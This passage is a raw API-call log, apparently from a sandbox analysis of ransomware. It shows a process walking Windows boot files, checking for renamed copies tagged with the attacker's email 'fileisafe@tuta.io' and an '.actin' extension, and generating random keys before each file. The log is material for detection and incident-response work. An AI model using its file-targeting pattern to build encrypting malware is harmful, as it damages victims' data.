0x20 [0140.678] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.678] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.678] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.679] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.680] ResetEvent (hEvent=0x29c) returned 1 [0140.680] SetEvent (hEvent=0x2a0) returned 1 [0140.680] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.680] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.680] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=156245) returned 1 [0140.680] CloseHandle (hObject=0x2e0) returned 1 [0140.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf")) returned 0x20 [0140.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.680] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.680] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.681] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.683] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.683] ResetEvent (hEvent=0x29c) returned 1 [0140.684] SetEvent (hEvent=0x2a0) returned 1 [0140.684] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.684] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.684] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=86178) returned 1 [0140.684] CloseHandle (hObject=0x2e0) returned 1 [0140.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf")) returned 0x20 [0140.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.684] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.684] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.686] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.686] ResetEvent (hEvent=0x29c) returned 1 [0140.686] SetEvent (hEvent=0x2a0) returned 1 [0140.686] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.686] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.686] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=79200) returned 1 [0140.686] CloseHandle (hObject=0x2e0) returned 1 [0140.686] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui")) returned 0x20 [0140.686] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.686] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.686] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.687] ResetEvent (hEvent=0x29c) returned 1 [0140.687] SetEvent (hEvent=0x2a0) returned 1 [0140.687] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.687] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.687] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=79192) returned 1 [0140.687] CloseHandle (hObject=0x2e0) returned 1 [0140.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0140.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.687] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.687] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.688] ResetEvent (hEvent=0x29c) returned 1 [0140.688] SetEvent (hEvent=0x2a0) returned 1 [0140.688] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.688] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.688] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=45984) returned 1 [0140.688] CloseHandle (hObject=0x2e0) returned 1 [0140.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui")) returned 0x20 [0140.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.688] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.689] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.689] ResetEvent (hEvent=0x29c) returned 1 [0140.689] SetEvent (hEvent=0x2a0) returned 1 [0140.689] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.689] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.689] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=76640) returned 1 [0140.689] CloseHandle (hObject=0x2e0) returned 1 [0140.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui")) returned 0x20 [0140.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.690] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.690] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.690] ResetEvent (hEvent=0x29c) returned 1 [0140.690] SetEvent (hEvent=0x2a0) returned 1 [0140.690] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.690] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.690] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=78688) returned 1 [0140.690] CloseHandle (hObject=0x2e0) returned 1 [0140.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0140.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.690] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.691] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.691] ResetEvent (hEvent=0x29c) returned 1 [0140.691] SetEvent (hEvent=0x2a0) returned 1 [0140.691] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.691] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.691] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=45976) returned 1 [0140.691] CloseHandle (hObject=0x2e0) returned 1 [0140.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui")) returned 0x20 [0140.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.691] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.692] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.692] ResetEvent (hEvent=0x29c) returned 1 [0140.692] SetEvent (hEvent=0x2a0) returned 1 [0140.692] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.692] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.692] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=77144) returned 1 [0140.692] CloseHandle (hObject=0x2e0) returned 1 [0140.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0140.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.693] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.693] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.693] ResetEvent (hEvent=0x29c) returned 1 [0140.693] SetEvent (hEvent=0x2a0) returned 1 [0140.693] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.693] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.693] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=45472) returned 1 [0140.693] CloseHandle (hObject=0x2e0) returned 1 [0140.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui")) returned 0x20 [0140.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.693] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.694] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.694] ResetEvent (hEvent=0x29c) returned 1 [0140.694] SetEvent (hEvent=0x2a0) returned 1 [0140.694] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.694] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.694] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=67424) returned 1 [0140.694] CloseHandle (hObject=0x2e0) returned 1 [0140.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0140.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.694] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.695] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.695] ResetEvent (hEvent=0x29c) returned 1 [0140.695] SetEvent (hEvent=0x2a0) returned 1 [0140.695] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.695] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.695] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=42904) returned 1 [0140.695] CloseHandle (hObject=0x2e0) returned 1 [0140.695] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui")) returned 0x20 [0140.695] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.695] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.696] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.696] ResetEvent (hEvent=0x29c) returned 1 [0140.696] SetEvent (hEvent=0x2a0) returned 1 [0140.696] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.696] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.696] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=66912) returned 1 [0140.696] CloseHandle (hObject=0x2e0) returned 1 [0140.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0140.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.696] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.697] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.697] ResetEvent (hEvent=0x29c) returned 1 [0140.697] SetEvent (hEvent=0x2a0) returned 1 [0140.697] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.697] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.697] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=42912) returned 1 [0140.697] CloseHandle (hObject=0x2e0) returned 1 [0140.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui")) returned 0x20 [0140.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.697] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.698] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.698] ResetEvent (hEvent=0x29c) returned 1 [0140.698] SetEvent (hEvent=0x2a0) returned 1 [0140.698] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.698] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.698] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=75616) returned 1 [0140.698] CloseHandle (hObject=0x2e0) returned 1 [0140.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui")) returned 0x20 [0140.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.698] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.699] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.699] ResetEvent (hEvent=0x29c) returned 1 [0140.699] SetEvent (hEvent=0x2a0) returned 1 [0140.699] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.699] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.699] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=75608) returned 1 [0140.699] CloseHandle (hObject=0x2e0) returned 1 [0140.699] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui")) returned 0x20 [0140.699] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.699] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.700] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.700] ResetEvent (hEvent=0x29c) returned 1 [0140.700] SetEvent (hEvent=0x2a0) returned 1 [0140.700] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.700] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 